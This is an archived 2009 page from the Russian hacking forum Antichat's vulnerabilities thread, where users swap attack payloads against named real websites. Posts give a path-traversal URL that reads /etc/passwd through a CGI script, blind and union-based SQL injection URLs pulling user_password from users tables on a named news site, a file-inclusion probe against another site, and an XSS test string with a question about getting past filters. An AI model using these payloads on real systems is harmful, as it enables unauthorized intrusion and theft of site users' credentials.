ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 768 из 1393 « Первая < 268668718758 764 765 766 767 768 769 770 771 772 7788188681268 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7671  
Старый 15.06.2009, 18:20
Fisher2003
Новичок
Регистрация: 10.06.2009
Сообщений: 4
Провел на форуме:
4993

Репутация: 0
По умолчанию
Цитата:
Сообщение от Rubaka  
а полный линк не хошь выложить?
Да пожайлуста

ka4ni.ру

Скажи и мне что там мона сделать особенно вот с этим
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
 

  #7672  
Старый 15.06.2009, 18:48
molotovkeyt
Новичок
Регистрация: 02.11.2008
Сообщений: 25
Провел на форуме:
147543

Репутация: 55
По умолчанию
ПР 6.
Не расковырял.
http://www.libyaonline.com/business/details.php?id=1'
 

  #7673  
Старый 15.06.2009, 18:50
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
isher2003, Да ничего, просто двиг, при нахождении некоторых символов орет - хакинг аттемпт (т.е. попытка взлома).
Последний раз редактировалось mailbrush; 15.06.2009 в 18:58..
 

  #7674  
Старый 15.06.2009, 19:13
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Цитата:
Сообщение от Велемир  
Тык инклуд работает ?)
http://www.alertsite.com/phplive/image.php?l=image.php

Так работает/будет работать или нет/не будет работать ? Ответа я так и не получил.Мне только выводит is_dir() функцию,как ты и писал.
 

  #7675  
Старый 15.06.2009, 19:23
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Цитата:
Сообщение от molotovkeyt  
ПР 6.
Не расковырял.
http://www.libyaonline.com/business/details.php?id=1'
Заурядная скуля

http://www.libyaonline.com/business/details.php?id=9846+and+1=if(ascii(substring((sele ct+user_password+from+users+limit+0,1),1,1))>1,1,0 )

Рядом есть с выводом

http://www.libyaonline.com/music/artist.php?id=-64+union+select+1,user_password,3,4,5,6+from+users +limit+0,1--+


Валемир, я думаю что нет
 

  #7676  
Старый 15.06.2009, 23:47
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию
привет. Возможно ли через xss баг произвести sql инъекцию, если да то как?
 

  #7677  
Старый 16.06.2009, 00:41
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310

Репутация: 7
По умолчанию
Кто чем ищет логи (конфиги итд....) апача при LFI?
 

  #7678  
Старый 16.06.2009, 00:44
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Цитата:
Сообщение от YuNi|[c  
привет. Возможно ли через xss баг произвести sql инъекцию, если да то как?
Нет.

Цитата:
Сообщение от farpost  
Кто чем ищет логи (конфиги итд....) апача при LFI?
http://forum.antichat.ru/thread49775.html
 

  #7679  
Старый 16.06.2009, 06:57
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию
Цитата:
Сообщение от mailbrush  
Нет.


http://forum.antichat.ru/thread49775.html
нет vailbrush ты сильно ошибаешся, я уже где то подробное описание видел на английском которое выполняли на xss ке тоесть внутри xss sql запросы, но к сожалению забыл где нашел. Вот поэтому спросил может здесь в ачате уже знают.
Вы еще скажите мне на запросе
Код:
1>"><ScRiPt%20%0a%0d>alert(401223179617)%3B</ScRiPt>
вместо номера 401223179617 фильтруется символы, как обходит этого? Чем зашифроват запрос?
 

  #7680  
Старый 16.06.2009, 07:49
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию
Цитата:
Сообщение от YuNi|[c  
нет vailbrush ты сильно ошибаешся, я уже где то подробное описание видел на английском которое выполняли на xss ке тоесть внутри xss sql запросы, но к сожалению забыл где нашел. Вот поэтому спросил может здесь в ачате уже знают.
ты не прав, XSS выполняется у тебя в браузере, а sql запросы идут к базе данных. Можно внутри sql инъекции заюзать xss, но не наоборот.
__________________
Feci, quod potui. Faciant meliora potentes.
 
 
Страница 768 из 1393 « Первая < 268668718758 764 765 766 767 768 769 770 771 772 7788188681268 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ